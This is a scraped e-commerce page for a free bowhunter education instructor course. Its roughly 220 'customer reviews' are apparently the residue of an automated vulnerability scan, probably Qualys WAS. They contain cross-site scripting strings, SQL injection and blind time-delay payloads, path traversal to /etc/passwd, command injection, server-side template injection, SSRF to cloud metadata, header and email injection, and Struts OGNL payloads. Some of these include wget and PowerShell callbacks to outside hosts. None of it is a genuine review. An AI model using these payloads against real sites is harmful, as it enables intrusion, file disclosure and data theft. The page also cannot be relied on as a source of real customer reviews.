Bowunter Education Instructor Course

(240 customer reviews)

$0.00

Course for hunter instructors.

240 reviews for Bowunter Education Instructor Course

  1. John

    1

  2. John

    “‘>

  3. John

    _q=random(X157828996Y2_2Z)

  4. John

    ‘ onEvent=X157828996Y2_2Z

  5. ” onEvent=X157828996Y3_2Z

    1

  6. John

    javascript:qxss(X157828996Y2_2Z);

  7. “>

    1

  8. John

    1″‘>

  9. John

    z–>

  10. “‘>

    1

  11. _q=random(X157828996Y3_2Z)

    1

  12. John

    1 _q_q=random(8x7D7ocb)

  13. John

  14. John

    ” SRC=//localhost/jBGNoeZb5>

  15. Anonymous

    1

  16. John

    “‘><qssDe532Dtt=7;//<

  17. John

    1″>

  18. John

    1

  19. BODY{background:url(“javascript:qssE2wH34F0=7”)}

    1

  20. ‘ onEvent=X157828996Y3_2Z

    1

  21. John

    ” onEvent=X157828996Y2_2Z

  22. John

    qss73Mn777e=7

  23. John

    %3cscript z%3e_q(y)%3c/script%3e

  24. John

    <script src=http://localhost/j

  25. John

    qss{{q=(2*2.0)}}qss

  26. John

    {{333*334}}

  27. John

    q
    Content-Type:text/html
    Content-Length: 190

    HTTP/1.1 200 OK
    Content-Type: text/html
    Set-Cookie: a=q
    Content-Length: 2

    AA

  28. John

    q
    Qualys_resp_hdr_injection: Vulnerable

  29. q Qualys_resp_hdr_injection: Vulnerable

    1

  30. John

    1′

  31. John

    ;–

  32. #

    1

  33. John

    /*

  34. John

  35. John

    ,

  36. John

    (

  37. 1e309

    1

  38. /../../../../../../../etc/passwd

    1

  39. John

    /../../../../../../../etc/passwd

  40. John

    ../../../../../../../etc/passwd

  41. John

    //..//..//..//..//..//..//..//etc/passwd

  42. //….//….//….//….//….//….//….//etc/passwd

    1

  43. John

    //….//….//….//….//….//….//….//etc/passwd

  44. John

    ../../../../../../../Windows/System32/drivers/etc/hosts

  45. ../../../../../../../Windows/System32/drivers/etc/hosts

    1

  46. php://filter/read=string.rot13/resource=/etc/passwd

    1

  47. ….//….//….//….//….//….//etc/passwd

    1

  48. John

    a(){}phpinfo(); function a

  49. |netstat -an

    1

  50. John

    |netstat -an

  51. John

  52. javascript:qxss(X157828996Y3_2Z);

    1

  53. John

    “;(function(){qxssKx7KAB2w});/**/”

  54. John

    “);(function(){qxssC689Qab8});/**/”

  55. qualys(aqxssp61Lf9G9)xyz

    1

  56. John

    ‘;(function(){qxsseR8gT0iS});/**/’

  57. John

    9;(function(){qxssA3UkiSVk});//

  58. John

    9
    ;(function(){qxsstZ26gsGv});//

  59. */;(function(){qxssE9te0hi0});/*

    1

  60. John

    ‘-qxss6WCAhBRS()-‘

  61. John

    “-qxssr5eWa3ek()-“

  62. John

    |aaaa
    =(23.0231*213.759)
    |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}

  63. John

    {23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}}

  64. ;echo 23.0231*213.759;//{@math key=4335.158242899999 method=”add” operand=586.23659/} /* #set($value=23.0231*213.759) $value */

    1

  65. (23.0231*213.759)

    1

  66. John

    function(){qxssCB4iSvHZ};

  67. John

  68. John

  69. John

    QualysWAS${“150898”.toString().replace(“8”, “7”)}QualysWAS

  70. John

    QualysWAS${150797*150797}QualysWAS

  71. Joe+ bcc:was_engine@9810ef31c1048216643edef3a16b27f0f2e47fc4.20713022819318563.3790655326.smtphi01.smtp.us3.qualysperiscope.com.

    1

  72. John

    b3b3391acb4d3dc072a2683315ae09ab5a0d6ed5.20713022819318563.3204195125.ssrf02.ssrf.us3.qualysperiscope.com.

  73. John

    ${dns:address|937ac7f065a78933ce9fb40ec67ae823d2159c96.20713022819318563.4103852191.oscomm04.oscomm.us3.qualysperiscope.com.}

  74. John

    $%7Bdns:address%7C@CIPHER@.@UNIQUEID@.@URI@.oscomm05.oscomm.@DOMAIN@%7D

  75. John

    1

  76. John

  77. John

  78. John

  79. John

  80. John

    ${dns:address|b5ff7a4bdf67dae4ab9c54f1194952a34f80ffce.20713022819318563.3992815236.oscomm21.oscomm.us3.qualysperiscope.com.}

  81. ${url:UTF-8:http://dbffbad5c1c376027d9a0bf0ba8f29bd78d326a4.20713022819318563.2846908885.oscomm22.oscomm.us3.qualysperiscope.com.}

    1

  82. ${url:UTF-8::http://08bf57da9521d3c1f24c881d382e3a4148120b2d.20713022819318563.553959226.oscomm24.oscomm.us3.qualysperiscope.com.}

    1

  83. {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen(‘wget http://d6da0239fb00b22b317fb3044924dbfb76a5f9a4.20713022819318563.1803230413.oscomm15019101.oscomm.us3.qualysperiscope.com.’).read() }}

    1

  84. John

    ${“”.getClass().forName(“java.net.InetAddress”).getMethod(“getByName”,””.getClass()).invoke(“”,”68410962483cff849fd8c5ca1aafb8add7e41891.20713022819318563.2179279839.oscomm15079701.oscomm.us3.qualysperiscope.com.”)}

  85. http://localhost:19096

    1

  86. John

    file:///etc/passwd

  87. John’) or 2634=2634 —

    1

  88. John

    1

  89. John

    1′ or 3789=3789 —

  90. John

    1 or 4325=4325 —

  91. John

    1

  92. John or NULL IS NULL

    1

  93. John

    1 and NULL IS NULL

  94. John

    1′) or ‘swqtp’=’swqtp

  95. John

    1′ or ‘tpklq’=’tpklq

  96. John

    11 or 11=11

  97. John

    1

  98. John

    aaaa&ping -n 92 localhost&

  99. John

    ping -c2 -i91 localhost

  100. John

    |ping -c2 -i56 localhost

  101. John

    |ping -c2 -i91 localhost|

  102. John

    1WAITFOR DELAY ’00:00:29′

  103. John

    1

  104. John;WAITFOR DELAY ’00:00:29′;

    1

  105. John

    1);WAITFOR DELAY ’00:00:29′–

  106. John’;WAITFOR DELAY ’00:00:29′–

    1

  107. John

    1′);WAITFOR DELAY ’00:00:29′–

  108. John

    1′,0,0);WAITFOR DELAY’00:00:29′–

  109. John

    1

  110. John

    1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)

  111. John

    1′ + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + ‘

  112. John

    1

  113. John

    1;SELECT sleep(29); —

  114. John(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*’XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); — OR’|”XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); — OR”*/

    1

  115. John

    1′ WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)– prime

  116. John

    1′ OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND ‘qualys’=’qualys

  117. John

    1(#context[“xwork.MethodAccessor.denyMethodExecution”]= new java.lang.Boolean(false), #_memberAccess[“allowStaticMethodAccess”]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))

  118. John

    _q=random(X2943918508Y2_2Z)

  119. John

    ‘ onEvent=X2943918508Y2_2Z

  120. John

    ” onEvent=X2943918508Y2_2Z

  121. John

    javascript:qxss(X2943918508Y2_2Z);

  122. John

    “>

  123. John”‘>

    1

  124. z–>

    1

  125. _q=random(X2943918508Y3_2Z)

    1

  126. John

    1 _q_q=random(5603SM9u)

  127. John

    ” SRC=//localhost/jql46vYnA>

  128. John

    “‘><qssaptd9FaE=7;//<

  129. John”>

    1

  130. John

    BODY{background:url(“javascript:qssBF1g9V0j=7”)}

  131. ‘ onEvent=X2943918508Y3_2Z

    1

  132. ” onEvent=X2943918508Y3_2Z

    1

  133. John

    qssLJ319bxc=7

  134. script z_q(y)/script

    1

  135. qss{{q=(2*2.0)}}qss

    1

  136. {{333*334}}

    1

  137. q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA

    1

  138. John

    q
    Qualys_resp_hdr_injection: Vulnerable

  139. John’

    1

  140. ;–

    1

  141. John

    #

  142. /*

    1

  143. 1

  144. ,

    1

  145. (

    1

  146. John

    1e309

  147. ../../../../../../../etc/passwd

    1

  148. //..//..//..//..//..//..//..//etc/passwd

    1

  149. John

    php://filter/read=string.rot13/resource=/etc/passwd

  150. John

    ….//….//….//….//….//….//etc/passwd

  151. a(){}phpinfo(); function a

    1

  152. http://rfitest/

    1

  153. javascript:qxss(X2943918508Y3_2Z);

    1

  154. John

    “;(function(){qxss3qX2O044});/**/”

  155. John

    “);(function(){qxssR1yndImk});/**/”

  156. John

    qualys(aqxss92965Be7)xyz

  157. John

    ‘;(function(){qxss3f1ZtEK9});/**/’

  158. John

    9;(function(){qxssyJbOdBo0});//

  159. John

    9
    ;(function(){qxssjL6QYtjy});//

  160. John

    */;(function(){qxss8n5u172e});/*

  161. John

    ‘-qxssC9l2w831()-‘

  162. John

    “-qxss8347Ve3z()-“

  163. |aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}

    1

  164. {23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}}

    1

  165. John

    ;echo 23.0231*213.759;//{@math key=4335.158242899999 method=”add” operand=586.23659/}
    /*

    #set($value=23.0231*213.759)
    $value
    */

  166. John

    (23.0231*213.759)

  167. function(){qxssSy58cziq};

    1

  168. http://169.254.169.254/latest/meta-data/

    1

  169. https://community.qualys.com/

    1

  170. QualysWAS${“150898”.toString().replace(“8”, “7”)}QualysWAS

    1

  171. QualysWAS${150797*150797}QualysWAS

    1

  172. John

    Joe+
    bcc:was_engine@0fd60337d3ed6b5c71cd74d6883a4f169a8ffa08.20963360819318563.3054094343.smtphi01.smtp.us3.qualysperiscope.com.

  173. 2fe81d9bd6719e65b77a3215ca5e09ccfb7854c7.20963360819318563.3966501216.ssrf02.ssrf.us3.qualysperiscope.com.

    1

  174. John

    ${dns:address|810cae56573c3f5d70b23921ac8b2d0090c3c9e2.20963360819318563.1793790745.oscomm04.oscomm.us3.qualysperiscope.com.}

  175. $dns:address@CIPHER@.@UNIQUEID@.@URI@.oscomm05.oscomm.@DOMAIN@

    1

  176. ${url:UTF-8:http://cc8bcf989c7565a558eadf627a23d79165c70dc1.20963360819318563.3177361947.oscomm06.oscomm.us3.qualysperiscope.com.}

    1

  177. John

    1

  178. John

    1

  179. ${url:UTF-8:https://@CIPHER@.@UNIQUEID@.@URI@.oscomm09.oscomm.@DOMAIN@}

    1

  180. John

    1

  181. John

    1

  182. powershell -c iwr -uri https://@CIPHER@.@UNIQUEID@.@URI@.oscomm13.oscomm.@DOMAIN@

    1

  183. John

    ${dns:address|aa70a31bb0d33467298fbc5be855999fc19bf991.20963360819318563.3343483489.oscomm21.oscomm.us3.qualysperiscope.com.}

  184. John

    {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen(‘wget http://262840f309f3dddff36cf486442f66e84505405c.20963360819318563.4291885217.oscomm15019101.oscomm.us3.qualysperiscope.com.’).read() }}

  185. John

    ${“”.getClass().forName(“java.net.InetAddress”).getMethod(“getByName”,””.getClass()).invoke(“”,”72019593e19efcabe3143b3370f5dc8619746425.20963360819318563.3118431278.oscomm15079701.oscomm.us3.qualysperiscope.com.”)}

  186. John

  187. file:///etc/passwd

    1

  188. John

    1′) or 2634=2634 —

  189. John

    1

  190. John’ or 3789=3789 —

    1

  191. John

    1

  192. John or 4325=4325 —

    1

  193. John

    1

  194. John

    1 or NULL IS NULL

  195. John

    1

  196. John and NULL IS NULL

    1

  197. John

    1

  198. John’) or ‘swqtp’=’swqtp

    1

  199. John

    1

  200. John’ or ‘tpklq’=’tpklq

    1

  201. John

    1

  202. John1 or 11=11

    1

  203. John

    1

  204. aaaa&ping -n 92 localhost&

    1

  205. ping -c2 -i91 localhost

    1

  206. |ping -c2 -i56 localhost

    1

  207. |ping -c2 -i91 localhost|

    1

  208. JohnWAITFOR DELAY ’00:00:29′

    1

  209. John

    1;WAITFOR DELAY ’00:00:29′;

  210. John);WAITFOR DELAY ’00:00:29′–

    1

  211. John

    1′;WAITFOR DELAY ’00:00:29′–

  212. John’);WAITFOR DELAY ’00:00:29′–

    1

  213. John’,0,0);WAITFOR DELAY’00:00:29′–

    1

  214. John + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)

    1

  215. John’ + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + ‘

    1

  216. John;SELECT sleep(29); —

    1

  217. John

    1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*’XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); — OR’|”XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); — OR”*/

  218. John’ WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)– prime

    1

  219. John

    1

  220. John’ OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND ‘qualys’=’qualys

    1

  221. John(#context[“xwork.MethodAccessor.denyMethodExecution”]= new java.lang.Boolean(false), #_memberAccess[“allowStaticMethodAccess”]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))

    1

Add a review

Your email address will not be published. Required fields are marked *